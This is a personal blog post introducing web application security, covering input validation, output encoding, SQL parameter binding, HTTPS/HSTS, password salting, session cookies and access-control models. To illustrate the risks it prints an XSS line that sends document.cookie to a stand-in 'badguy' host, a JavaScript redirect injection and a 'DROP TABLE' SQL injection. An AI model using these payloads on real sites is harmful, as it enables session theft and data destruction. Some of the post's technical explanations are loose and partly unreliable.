Web Application Security

One of the biggest challenges in the web is security. Now when we speak of security it is something every one recognizes the need for, but really have not much idea on how to go about it. The standard perception of security is that you login with your credentials, the application or website authenticates it, and takes you to your home page. And yes there is authorization, where you are given access based on your role. Authentication and authorization though is a very basic look at web security, there is a much larger scope out there to be explored.

Problem is quantifying security or answering the question “how secure enough is your web application”. It is not possible to explore the entire security issue in a single article, what this post intends to do is have a broad look at some of the security risks and how to tackle them. Basically it has to do with a question of trust, do we trust integrity of data coming in from a browser? Do we trust connection between browser and user application can’t be tampered?

Validating Form Input

Basically when we are entering some data in a HTML form, we trust we are entering some valid data. This is due to the inbuilt form validations via Client Side Java Script or server side rules. But is the data we are entering in a form secure? NO.

Even if we are using HTTPS, and doing form validation, the data we are getting from a form is basically untrustworthy. User can use something like curl to submit false data or modify the markup. Or it could be untrustworthy data from a hostile website. Problem with malformed data is that there is every chance of unexpected behavior or data leaks. For eg we have the following code where user selects type of notification

final String notificationType=req.getParameter(“notification”);

if(notificationType.equals(“email”)

{

notifyEmail();

}

else

if(notificationType.equals(“SMS”)

{

notifySMS();

}

else

{

showError(“Select valid notification kind”);

}

How do we ensure that uncontrolled flow can be eliminated here? This is where form validation comes in. Invalid input data can violate business logic or trigger faults, even allow an attacker to take control. Input validation is often the first line of defense against this risk. Basically this is for values restricted within a particular range. For eg during a fund transfer, entering amount like -9000 makes no sense really. This form of input validation to ensure data is entered in the right format is called positive validation or white listing. But what to do when input fails validation?  For eg in the above example, if you are getting values other than SMS or Email, there is either a bug or an attack. Now say if you are provided with notificationType as “Chat” you may get an error message saying Chat is not a valid notification. But what if you have a notificationType like

new Image().src = ‘http://badguy.ratnakar.com/steal?’ + document.cookie

This is a more serious XSS reflective attack that steals session cookies, and you really can’t provide user feedback here.  One way is to filter <script> tag to get over. This strategy of rejecting input having known dangerous values is called negative validation or blacklisting. Problem is list of possible dangerous values in input, is very large and needs to be maintained. One way out is sanitization where instead of rejecting undesirable input, it simply filters it out. Again this is not particularly safe, as attacker could by pass it.

Most frameworks like Struts, Spring have built in input validation functionality, as well as in external libraries. The advantage here is that validation logic is pushed to the first layer of your web tier application, ensuring invalid data does not reach your application.

Encode HTML Output

Apart from input data, developers also need to look at the output too. If we take a standard web application it has HTML markup for structure, CSS for styling, Java Script for logic, and the user generated content from server side, which is rendered in a combined format. Browsers try rendering content even if it is malformed, which however is a major vulnerable point. And this risk becomes higher when you render data from an untrusted source. As we have seen earlier, what happens if we get input containing special characters like {}, <>,”. This is where output encoding comes in.

Basically it is the process of converting the output data to a final format. Problem is you might need to give a different codec, depending on how data is consumed. Without proper encoding, there is every chance of client getting misformatted data, that could be exploited by an attacker. For eg if say our PM himself is a customer to the site. In HTML it would be

<p> Narendra  Modi</p>

or rendering it as Narendra Modi.

But what happens if we get output like

document.getElementById(‘name’).innerText = ‘Narendra ‘Damodardas’ Modi //<–unescaped string

This is what we call as malformed JavaScript, which is what hackers look for too. Now if PM enters name as

Narendra ‘Damodar’ Modi ;window.location=’http://villian.gabbarsingh.com/&#8217;;

You are pushing the user to a hostile website, this is where you need to implement encoding strategies.

‘Narendra ‘Damodar’ Modi \’;window.location=\’http://villian.gabbarsingh.com/\’;

This is just one way of encoding using a \ character. Most frameworks have mechanisms for rendering content safely and filtering out reserved characters. With a plethora of frameworks and encoding contexts available, there are certain rules to be observed. Check the kind of encoding your framework does as well as a particular context. While you could handle encoding at rendering time, it often adds a lot of complexity to the code as also posting the data in a non HTML format.

Bind Parameters for Database Queries

Database is the most crucial part of a web application as it contains state can’t be easily restored. It also has sensitive information that needs to be protected. Whether you are using SQL or an ORM or a NoSQL database, you need to look at how input data is used in your queries. Let’s say I have this method for adding new students

void addStudent(String lastName, String firstName) {
String query = “INSERT INTO students (last_name, first_name) VALUES (‘”
+ lastName + “‘, ‘” + firstName + “‘)”;
getConnection().createStatement().execute(query);
}

Now if I am adding something like “Ratnakar” “Sadasyula”, SQL output would be

INSERT INTO students (last_name, first_name) VALUES (‘Sadasyula’, ‘Ratnakar’)

Now if input is something like

INSERT INTO students (last_name, first_name) VALUES (‘AAA’, ‘Bobby’); DROP TABLE Students;– ‘)

It actually ends up executing two commands, insert as well as Drop table Students.

This has ample scope for misuse including violating data integrity, exposing sensitive information.

A very simple approach to this issue is by parameter binding like below. This  separates executable code from content, transparency in handling. In a way this also helps in clean code and makes it more comprehensible.

void addStudent(String lastName, String firstName) {
PreparedStatement stmt = getConnection().prepareStatement(“INSERT INTO students (last_name, first_name) VALUES (?, ?)”);
stmt.setString(1, lastName);
stmt.setString(2, firstName);
stmt.execute();
}

For eg in JDBC it is always preferable to use parameter binding, than using String concatenation in binding. It is the same for Hibernate or JPA using SetParameter. In fact even if you are having a NoSQL database, it is still vulnerable to injection attack.

Protecting Data in Transit

So far we have been seeing only the input and output data, but what about the data in transit. If we are using a standard HTTP connection, the data transferred in plain text is vulnerable to misuse. In the transit between the browser and server, user can eavesdrop or tamper in what is called a man-in-the-middle attack. Open Wi Fi network like in airports or cafe, are especially very vulnerable. Either the ISP could inject ads into their traffic or could be used for surveillance.

HTTPS was used to secure sensitive web data, like say financial transactions, but now it has become a more default mode even in Social Networking sites. HTTPS protocol uses Transport Layer Security(TLS), to secure communications, which in fact is a successor to SSL(Secure Sockets Layer). It provides confidentiality and data integrity, as well as authenticating web site identity. Though it had some initial hurdles like expensive cost of hardware and only one web site certificate per IP address. Modern hardware has now made it cheaper. And protocol extension called SNI( Server Name Indication), has made it possible to get web certificates for multiple IP address. Also introduction of Free Certificate services like Let’s Encrypt has made it more widespread.

When we use TLS, a site provides identity using a public key certificate which contains information about the site, as well as the key that proves the site is the owner of the certificate, using a private key that only it knows. Generally a trusted 3rd party  called a Certificate Authority(CA) verifies the site’s identity, and grants a signed certificate to indicate it’s verified. This has different levels of certification offered, the most basic being Domain Validation( DV) which certifies certificate owner controls a domain. There are others like OrganizationValidation(OV) and ExtendedValidation(EV) doing additional checks.

You can configure your server to support HTTPS. But how do we make sure our site or application, is compatible with uses who might be using very old browsers, supporting much older protocols and algorithms. Supporting dated versions of protocols makes it very vulnerable to attack. Fortunately there are tools like Mozilla’s SSL Configuration Generator, that generate configurations for the web servers. Now generally a website has HTTPS for only some resources, say login page or confidential data.  Problem is if you use a normal HTTP request here, it is very susceptible to man-in-the-middle attack. We simply can’t shut down HTTP  network port here, as the browser usually redirects to HTTPS even when you type in HTTP.

However just redirecting requests is a risky approach by itself. To get over this , most browsers nowadays support a powerful feature called HSTS(HTTP Strict Transport Security), which allows a site to interact with a browser, only if interacts in HTTPS. Enabling HSTS, will automatically convert HTTP requests to HTTPS. Also setting secure flag in a cookie will instruct a browser to send it, only when using HTTPS. And this ensures safety of sensitive information. And finally you can also make use of SSL Labs SSL Server Test to perform a deep analysis of your configuration.

Protecting User Passwords

Passwords is one of the most vulnerable asset of your application. While storing user id and password in a database table is the most obvious way, it is not at all a recommended approach. While it does keep out invalid users, it is vulnerable in many other ways. Some one like an Application Developer or DBA, who has access to credentials can easily impersonate a user. Even otherwise storing a password in database with no cryptographic protection, makes it vulnerable to attack vectors.

One way of securing passwords is using a hashing technique. Use a cryptographic hashing algorithm to transform your password to an encrypted form. However this is hard to decrypt and recover. For eg if you have a password “helloworld”, and applying a Salting technique you get some hex result, that will be stored in database. Now if you want to validate,  apply same hashing algorithm to the password text and if it matches, it is valid.

The issue here though is multiple users use the same password “helloworld”, you will be having the same hash in database. An attacker can get hold of the password store and reverse engineer by cross referencing a look up table having your password hashes.

This is where we use “salt” techniques where some extra data is added to password before hashing. The advantage is two instances of a password won’t be having the same hash value. So if we have two passwords named “helloworld”, you can use salt string “ABCE” for one and “DFDGF” for another, ensuring you have two different hash values here. What you are doing here is storing the password with a hash, salt and work factor. So when you login here, the application uses salt again to generate a hash to do comparison with the one in database.

Authenticate Users

Authentication is basically validating a user while logging into an application. Authorization is defining what a user is supposed to do. For eg if you log into a banking application, you can check your balance statement, but cannot modify it. Authorization and authentication is combined in session management.  What Session Management does is to relate requests to a particular user, so that a user does not have to authenticate during each request. What happens is once a user is authenticated, their identity is tied to a session for subsequent requests.

One concern is how to ensure credentials are private when sent over a network. Preferably the easiest way is to use HTTPS for all requests. One way is having a login form, where user enters credentials and is validated in database. We can also authenticate uses using a PIN or a mobile code. One of the more convenient options is SSO(Single Sign On), where users can log in using a single identity. For eg you can log into any site, using your Google credentials. Here SSO relies on external service to manage the logging in. At times a single factor of authentication like user and password may not be enough. In this case you can use a TFA( Two Factor Authentication), this could be secret code sent to your mobile phone or a hard ware token. For eg in an online shopping or travel web site, a secret code is sent to user’s mobile to validate. Also in the event of user giving an invalid password, it is better to send an email link to reset password, than showing an error message. Most frameworks have authentication mechanisms that support a variety of schemes, the best examples being Apache Shiro, Spring Security.

Protecting User Sessions

HTTP being stateless has no in built mechanism for relating user data across requests, which is why we use sessions. Now sessions are a vulnerable target for attacks, say some one hijacks authenticated sessions, they can effectively bypass authentication. One way is to use an existing framework to handle session management. Sessions are typically created using a session identifier inside a cookie, sent by a user’s browser. Now if an attacker can manage to get hold of a session id, they can hijack the entire session. For eg if a session id for a cookie follows a particular sequence say AAA243HH and AAA3484KK, attacker can guess the base encoding and decode to get the values.

In order to get over this ,its better to have a session id of minimum 128 bits generated using a secure pseudorandom number generator. Some implementations put user information inside of a cookie to bypass looking up in a data store. However unless implemented with care, this could actually lead to more problems. If you do need to store in a cookie, do not store confidential data like user id, password and limit the length. Also do not expose session identifiers in a URL, as they can be exposed to 3rd party who in turn would use it for their own ends.

In case you are using cookies, some simple precautions have to be undertaken to make sure they are not unintentionally exposed. There are 4 attributes here, Domain restricts scope of a cookie to a particular domain, Path to a path and subpaths. You need to ensure that Path and Domain are as restrictive as possible. Secure flag indicates browser should send cookie only when using HTTPS. HttpOnly flag indicates cookie should not be accessible by JavaScript or any client side scripts. So it could be something like

Set-Cookie: sessionId=[FDJ5435JJJ]; path=/mybooks/; secure; HttpOnly;
domain=mybooks.ratnakar.com

Another way to reduce risk is effective management of session lifecycle. There is a chance that attacker to set session id to a less privileged session for eg in a hidden form field. This is an attack called session fixation. Two ways to tackle this issue, create a new session either when user authenticates or moves to a higher privilege level. And next we create session id ourselves. Also we put session timeouts, to ensure that the session does not take too much time for an attacker to break in. This again depends, for eg on Facebook, it might have a longer time out. On the other hand for your net banking application it might time out after just 10 minutes.

Authorize Actions

We have seen that Authorization is used to enforce permissions to the user of what and what not to access. Authorize must always be done on the server, for eg hiding the delete button on a page for a user is always risky. Client should never pass authorization information to the server, rather it should pass only temporary information like session ids. By default it should deny any action to the user, unless explicitly allowed.

Generally speaking you have two kinds of authorization, global permissions and resource level permissions. For global it is generally straightforward, as it applies across to all resources. For eg if I need to shutdown the server, could be something like

public String shutdown(User callingUser) {
if (callingUser != null && callingUser.hasPermission(Permission.SHUTDOWN)) {
doShutdown();
return “SUCCESS”;
} else {
return “PERMISSION_DENIED”;
}
}

Resource validation on the other hand is more complex, as it validates if an actor can act on a particular resource. For eg a User has the right to modify only their own profile, not others.

If we take the entire process, it would be as follows

  • An actor becomes a principal after authentication.
  • Policy specifies what action the principal can take against a resource.
  • If Policy allows the action, the only execute.

Most common form of authorization is RBAC( Role Based Access Control), users are given roles, which in turn are assigned permissions. For eg an Admin has permission to delete users, we implement the code in such a way, only they can perform the action. Here we are linking role to the action instead of user identity. In this way, whoever is the Admin can delete the users.

But what if some admins have only privilege to add and modify users but can’t delete them.  In such a case, it would be more appropriate to go with permission based access control, instead of just roles. So here we map user identity to the permissions. Basically Role Based Access is used if you have a fixed set of permissions, and there is not a large permutation of user permissions.

However if it has a more advanced security level, that can’t be handled with just RBAC, would be better to go for Attribute Based Access Control( ABAC). For eg, I want to grant permissions based on user’s job description or country.  It might be a case where I want admins in India to read and update the user list, but admins in China can only read the list. Or admins can’t delete users on a national holiday or weekend. You can make use of XACML here, a format defined by OASIS. ABAC can be used when permissions are highly dynamic, and access control is sensitive enough to factor in the various control flows.

Other approaches that can be considered are

MAC-Mandatory Access Control, centrally managed policy, that can’t be overridden based on subject attributes.

REBAC- Relationship Based Access Control, policy determined by relationship between principals and resources.

DAC- Discretionary Access Control, that specifies owner managed access control.

And finally some standard precautions

  • Always set the Cache Control header to “private no-cache no-store” for resources to ensure your server side authorization code is called always.
  • Reduce duplication of authorization logic.

 

 

 

 

Advertisements

About Ratnakar Sadasyula

I am a 40 year old Blogger with a passion in movies, music,books, Quizzing and politics. A techie by profession, and a writer at heart. Seeking to write my own book one day.
This entry was posted in Application Security and tagged . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s